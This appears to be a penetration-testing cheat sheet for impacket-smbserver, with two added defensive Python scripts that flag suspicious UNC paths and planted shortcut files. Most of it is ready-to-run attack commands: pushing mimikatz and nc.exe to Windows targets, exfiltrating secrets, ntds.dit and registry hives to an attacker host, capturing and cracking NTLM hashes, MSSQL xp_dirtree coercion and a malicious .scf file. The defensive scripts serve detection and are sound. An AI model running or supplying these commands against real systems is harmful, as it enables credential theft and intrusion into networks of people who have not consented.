Overview
impacket-smbserver spins up a lightweight SMB server on your attack box. Primary uses:
- Transfer files to/from Windows targets
- Capture NTLM hashes from incoming connections
- Host DLLs or payloads for UNC path injection attacks
No domain or Windows OS required — runs anywhere Python and Impacket are installed.
Basic Usage
Host a directory as an SMB share.
# Share the current directory as "SHARE"
impacket-smbserver SHARE $(pwd)
# Share a specific directory
impacket-smbserver SHARE /tmp/tools
# Listen on a specific interface
impacket-smbserver SHARE /tmp/tools -ip 10.10.14.5
From the Windows target:
# List the share
dir \\10.10.14.5\SHARE
# Copy a file from attacker
copy \\10.10.14.5\SHARE\nc.exe C:\temp\nc.exe
With SMB2 Support (-smb2support)
Modern Windows versions block SMBv1 by default. Always use -smb2support.
impacket-smbserver SHARE /tmp/tools -smb2support
Without this flag, Windows 10+ and Server 2016+ will refuse the connection.
With Authentication (-username, -password)
Some Windows policies block guest/anonymous SMB access. Add credentials to bypass this.
impacket-smbserver SHARE /tmp/tools -smb2support -username user -password pass
From the Windows target:
# Mount with credentials
net use Z: \\10.10.14.5\SHARE /user:user pass
# Or use the share directly
copy \\10.10.14.5\SHARE\payload.exe C:\temp\payload.exe
# Disconnect when done
net use Z: /delete
Serving Files to Windows Targets
Direct Copy
# On attacker
impacket-smbserver SHARE /tmp/tools -smb2support
# On target — copy individual files
copy \\10.10.14.5\SHARE\mimikatz.exe C:\temp\
copy \\10.10.14.5\SHARE\SharpHound.exe C:\temp\
# Run directly from share (no copy to disk)
\\10.10.14.5\SHARE\SharpHound.exe -c All
Execute In-Memory (PowerShell)
# Load a script from the share
. \\10.10.14.5\SHARE\PowerView.ps1
# Or via IEX
IEX (Get-Content \\10.10.14.5\SHARE\script.ps1 -Raw)
Receiving Files from Windows Targets (Exfiltration)
# On attacker — share a writable directory
mkdir /tmp/loot
impacket-smbserver SHARE /tmp/loot -smb2support
# On target — copy files to attacker
copy C:\Users\Admin\Desktop\secrets.txt \\10.10.14.5\SHARE\
copy C:\Windows\NTDS\ntds.dit \\10.10.14.5\SHARE\
copy C:\Windows\System32\config\SAM \\10.10.14.5\SHARE\
copy C:\Windows\System32\config\SYSTEM \\10.10.14.5\SHARE\
# Dump registry hives and exfil
reg save HKLM\SAM \\10.10.14.5\SHARE\SAM
reg save HKLM\SYSTEM \\10.10.14.5\SHARE\SYSTEM
reg save HKLM\SECURITY \\10.10.14.5\SHARE\SECURITY
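Seen from the defender's side, every transfer, run-from-share and hive-save command above puts a UNC path to a non-corporate host into the process command line. The following is an added example, not part of the original cheat sheet, that triages such command lines as they would appear in process-creation logs (for instance Sysmon Event ID 1 or Security 4688 with command-line auditing). The allowlist host name, the rule labels and the sample lines are constructed assumptions.

```python
import re
from ipaddress import ip_address

# Assumed allowlist of legitimate file servers (hypothetical name).
ALLOWED_SMB_HOSTS = {"fs01.corp.example"}

# \\host\share... ; group 1 is the host part of the UNC path.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\[^\\\s\"']+")

# (label, pattern) pairs that raise a non-allowlisted UNC hit to "high".
HIGH_RULES = [
    ("registry hive saved to remote share",
     re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM|SECURITY)\b", re.I)),
    ("credential store file copied to remote share",
     re.compile(r"ntds\.dit|\\config\\(SAM|SYSTEM|SECURITY)\b", re.I)),
    ("script loaded from remote share",
     re.compile(r"\bIEX\b|\bInvoke-Expression\b|^\s*\.\s+\\\\", re.I)),
    ("binary executed from remote share",
     re.compile(r"^\s*\"?\\\\[^\s\"]+\.(exe|dll|bat|cmd)\b", re.I)),
]

def is_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def classify(cmdline):
    """Return (severity, reasons) for one process-creation command line."""
    hosts = {m.group(1).lower() for m in UNC_RE.finditer(cmdline)}
    unlisted = sorted(h for h in hosts if h not in ALLOWED_SMB_HOSTS)
    if not unlisted:
        return "none", []
    reasons = [f"UNC path to {'raw IP' if is_ip(h) else 'unlisted host'} {h}"
               for h in unlisted]
    hits = [label for label, rx in HIGH_RULES if rx.search(cmdline)]
    return ("high" if hits else "medium"), reasons + hits

# Constructed sample command lines, shaped like the commands on this page.
SAMPLES = [
    r"reg save HKLM\SAM \\10.10.14.5\SHARE\SAM",
    r"copy \\10.10.14.5\SHARE\nc.exe C:\temp\nc.exe",
    r"\\10.10.14.5\SHARE\tool.exe -c All",
    r"copy \\fs01.corp.example\public\report.docx C:\temp\report.docx",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line)
```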
Capturing NTLM Hashes
Any Windows host that connects to your SMB server attempts NTLM authentication. The server prints the resulting NetNTLMv2 challenge-response (the "hash") to stdout; save it for offline cracking.
# Start the server and watch for hashes
impacket-smbserver SHARE /tmp/tools -smb2support
Trigger a connection from the target:
# Any UNC path access triggers NTLM auth
dir \\10.10.14.5\SHARE
type \\10.10.14.5\SHARE\test.txt
Captured hash format (NetNTLMv2):
user::DOMAIN:challenge:response:blob
Crack with hashcat:
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
DLL Hosting / UNC Path Injection
Host a malicious DLL on your SMB server, then trigger a vulnerable application to load it via a UNC path.
# Host the DLL
impacket-smbserver SHARE /tmp/payloads -smb2support
Common injection points:
# DLL hijacking via PATH
\\10.10.14.5\SHARE\evil.dll
# Responder/LLMNR poisoning → DLL load
# Office macro UNC reference
# Web application SSRF to UNC → hash capture
# SQL injection → xp_dirtree('\\10.10.14.5\SHARE')
MSSQL Hash Capture via xp_dirtree
EXEC xp_dirtree '\\10.10.14.5\SHARE', 1, 1;
Shortcut File (.lnk / .scf) for Hash Capture
Place a malicious .scf file on a writable share the victim browses:
[Shell]
Command=2
IconFile=\\10.10.14.5\SHARE\icon.ico
[Taskbar]
Command=ToggleDesktop
Windows Explorer automatically loads the icon, triggering NTLM auth.
The .scf icon auto-load trick is patched on modern Windows (Windows 10 / Server 2019+ by default; Windows 7/8/Server 2008–2016 after the Aug 2024 patch). On up-to-date hosts, browsing the folder no longer triggers auth — use other coercion file formats (.library-ms, .url, .lnk with a UNC icon) where still applicable.
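To find planted coercion files on shares you administer, the check below walks a directory tree and reports any INI-style shortcut (.scf or .url) whose key points at a UNC path on a host outside an allowlist. It is an added example, not part of the original cheat sheet; the function names, the directory layout and both sample files are constructed, and binary .lnk and XML .library-ms files are out of scope.

```python
import tempfile
from pathlib import Path

# INI-style shortcut formats only; .lnk (binary) and .library-ms (XML) need
# their own parsers and are not handled here.
INI_SHORTCUT_SUFFIXES = {".scf", ".url"}

def decode(data):
    """Shortcut files are usually ANSI/UTF-8 but may be UTF-16 with a BOM."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8", errors="replace")

def remote_refs(text):
    """Yield (key, host) for each key=value line whose value is a UNC path."""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(("[", ";")) or "=" not in line:
            continue
        key, value = (part.strip().strip('"') for part in line.split("=", 1))
        if value.startswith("\\\\"):
            host = value[2:].split("\\", 1)[0].lower()
            if host:
                yield key, host

def scan_share(root, allowed_hosts=frozenset()):
    """Return sorted (relative path, key, host) findings under root."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in INI_SHORTCUT_SUFFIXES:
            rel = path.relative_to(root).as_posix()
            for key, host in remote_refs(decode(path.read_bytes())):
                if host not in allowed_hosts:
                    findings.append((rel, key, host))
    return sorted(findings)

def demo():
    """Scan a throwaway directory holding two constructed sample files."""
    with tempfile.TemporaryDirectory() as tmp:
        share = Path(tmp)
        (share / "docs").mkdir()
        # Constructed sample: the .scf shown above.
        (share / "docs" / "desktop.scf").write_text(
            "[Shell]\nCommand=2\nIconFile=\\\\10.10.14.5\\SHARE\\icon.ico\n"
            "[Taskbar]\nCommand=ToggleDesktop\n")
        # Constructed sample: a benign .url with a local icon.
        (share / "intranet.url").write_text(
            "[InternetShortcut]\nURL=https://intranet.corp.example/\n"
            "IconFile=C:\\Windows\\System32\\shell32.dll\n")
        return scan_share(share)
```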
Common Use Cases in Pentest Workflow
| Scenario | Setup |
|---|---|
| Transfer tools to target | Host /tools dir, copy from target |
| Exfil SAM/SYSTEM/ntds.dit | Share writable dir, reg save to UNC |
| Capture hashes (no Responder) | Trigger UNC path access from target |
| Run exe from share (fileless) | \\attacker\SHARE\tool.exe |
| Load PowerShell from share | . \\attacker\SHARE\script.ps1 |
| DLL sideloading | Host DLL, point vulnerable app to UNC |
| Relay hash capture + crack | Combine with ntlmrelayx or standalone |
Quick Reference
| Task | Command |
|---|---|
| Basic share | impacket-smbserver SHARE /path |
| SMB2 (required for Win10+) | impacket-smbserver SHARE /path -smb2support |
| With auth | impacket-smbserver SHARE /path -smb2support -username user -password pass |
| Bind to IP | impacket-smbserver SHARE /path -smb2support -ip 10.10.14.5 |
| Custom port | impacket-smbserver SHARE /path -smb2support -port 4445 |
| Copy from attacker | copy \\ATTACKER_IP\SHARE\file.exe C:\temp\ |
| Copy to attacker | copy C:\file.txt \\ATTACKER_IP\SHARE\ |
| Mount share | net use Z: \\ATTACKER_IP\SHARE /user:user pass |
| Run from share | \\ATTACKER_IP\SHARE\tool.exe |
| Crack captured hashes | hashcat -m 5600 hashes.txt wordlist.txt |